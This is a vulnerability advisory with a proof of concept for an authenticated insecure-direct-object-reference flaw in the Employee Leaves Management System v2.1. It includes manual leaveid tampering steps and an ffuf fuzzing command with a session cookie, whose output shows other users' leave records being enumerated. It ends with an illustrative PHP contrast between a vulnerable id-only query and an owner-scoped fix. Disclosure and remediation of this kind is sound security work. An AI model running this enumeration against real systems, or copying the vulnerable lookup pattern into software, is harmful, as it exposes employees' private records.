# Exploit Title: Employee Leaves Management System (ELMS) v2.1 - Authenticated Insecure Direct Object References (IDOR)
# Date: 2025-03-04
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/employee-leaves-management-system-elms/
# Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=7175
# Tested on: Kali Linux
# CVE: N/A

PoC:

1. Log in as an employee.
2. Go to the leaves tab, where you will see your own leaves. Clicking the "view details" button for one of your own leaves shows its details. However, you can see the leaves of any user by changing the leaveid parameter here (leaveid=11).

3. Try another leaveid:
http://10.0.2.15/leave-details.php?leaveid=12

4. Read all of the leave contents of the other user.

5. Fuzzing:
############### ############### ############### ###############

➜ ~ ffuf -c -ic -w leave_ids.txt -u http://10.0.2.15/leave-details.php\?leaveid\=FUZZ -H 'Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325' -fw 3139

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.0.2.15/leave-details.php?leaveid=FUZZ
:: Wordlist : FUZZ: /home/t00r6x0/leave_ids.txt
:: Header : Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 3139
________________________________________________

12 [Status: 200, Size: 11186, Words: 4521, Lines: 233, Duration: 9ms]
11 [Status: 200, Size: 11177, Words: 4522, Lines: 233, Duration: 980ms]
13 [Status: 200, Size: 11148, Words: 4517, Lines: 233, Duration: 991ms]



############### ############### ############### ###############


leaveid=12 and leaveid=13 do not belong to my user.
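
The behaviour above means leave-details.php returns whichever record leaveid names, without tying it to the logged-in employee. The following is an added example, not ELMS source code and not from the advisory author: it contrasts an id-only lookup with an owner-scoped one on a constructed in-memory table. The table, column and function names are hypothetical, and the employee id is assumed to be stored in the server-side session at login.

```php
<?php
// Added example: constructed schema and data, not the ELMS code base.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE leaves (id INTEGER PRIMARY KEY, emp_id INTEGER NOT NULL, description TEXT)');
$db->exec("INSERT INTO leaves (id, emp_id, description) VALUES
    (11, 1, 'constructed: own leave'),
    (12, 2, 'constructed: colleague leave'),
    (13, 3, 'constructed: colleague leave')");

// Pattern behind the finding: the row is selected by leaveid alone,
// so any logged-in employee gets any record back.
function leaveByIdOnly(PDO $db, $leaveId): ?array
{
    $stmt = $db->prepare('SELECT * FROM leaves WHERE id = :id');
    $stmt->execute([':id' => $leaveId]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Hardened lookup: the owner is taken from the server-side session, never
// from the request, and is part of the WHERE clause.
function leaveForEmployee(PDO $db, $leaveId, int $sessionEmpId): ?array
{
    $id = filter_var($leaveId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // a malformed id gets the same answer as a foreign one
    }
    $stmt = $db->prepare('SELECT * FROM leaves WHERE id = :id AND emp_id = :emp');
    $stmt->execute([':id' => $id, ':emp' => $sessionEmpId]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

$sessionEmpId = 1; // stands in for the employee id kept in $_SESSION (assumption)
foreach ([11, 12, 13, 'x'] as $leaveId) {
    $before = leaveByIdOnly($db, $leaveId) ? 'row returned' : 'not found';
    $after  = leaveForEmployee($db, $leaveId, $sessionEmpId) ? 'row returned' : 'not found (send 404)';
    printf("leaveid=%-4s id-only: %-13s owner-scoped: %s\n", $leaveId, $before, $after);
}
```

Answering a foreign leaveid exactly like a nonexistent one keeps the response from confirming which ids exist.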